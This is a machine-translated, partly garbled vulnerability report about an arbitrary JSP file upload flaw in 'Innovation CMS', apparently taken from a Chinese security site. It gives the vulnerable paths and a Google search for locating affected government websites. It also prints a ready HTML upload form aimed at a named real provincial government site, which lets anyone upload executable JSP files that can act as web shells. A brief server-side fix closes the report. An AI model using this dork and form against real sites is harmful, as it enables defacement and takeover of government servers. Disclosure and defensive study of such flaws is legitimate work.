Innovation CMS uploadImageFile_do. jsp page file upload vulnerability-vulnerability warning-the black bar safety net

2013-08-03T00:00:00
ID MYHACK58:62201340047
Type myhack58
Reporter 健宇
Modified 2013-08-03T00:00:00

Description

Brief description:

Innovation CMS any upload JSP executable script file vulnerability, affecting a large number of office, municipal government website.

Detailed description:

Before the vulnerability is reported in a cnvd, it should be cnvd requirements to the vulnerability reported to the tick.

!

Vulnerability to prove:

Innovation CMS upload 0day present position

/creatorcms/comm_front/email/uploadImageFile_do. jsp

/comm_front/email/uploadImageFile_do. jsp

Via Google search keywords can see the relevant government website

http://www.google.com.hk/search?hl=zh-Hans-HK&source=hp&q=comm_front%2Femail%2F&gbv=2&oq=comm_front%2Femail%2F&gs_l=heirloom-hp. 1 2...15360.15360.0.16453.1.1.0.0.0.0.0.0..0.0...0.0..0.1 c. govyZeEz1ZI

!

There are a total of 2 6,5 0 0 article results, you can see the government website using the section to create a cms or many. Vulnerability file out in the mailbox, such as a website of the Office of the Director of the mailbox, an office site for the Director of the mailbox, in the mailbox there is a upload attachment, is to allow the masses to upload attachments to the leaders view some relevant pictures or the like, since the website program to upload the filter is not strict result of the presence can upload arbitrary file vulnerability.

Exploit the method, the local structure of the form to the Hunan Provincial Department of Agriculture website as an example

<form id="frmUpload" enctype="multipart/form-data" action="http://www.hnagri.gov.cn/comm_front/email/uploadImageFile_do.jsp" method="post">

Upload a new file:<br>

<input type="file" name="NewFile" size="5 0"><br>

<input id="btnUpload" type="submit" value="Upload">

</form>

By saving the following code as an HTML file you can select any of the JSP file to be uploaded.

!

Choose a good file point the upload can see the results.

!

As shown, you can directly upload JSP file, if used by hackers can lead to large-scale government web site is malicious tampering, hanging horse。

Repair solutions:

Upload files for server-side validation, only allowed to upload JPG,GIF,BMP files, and case are all converted into lower case, 0x00, semicolon, Colon, and other special symbols are filtered.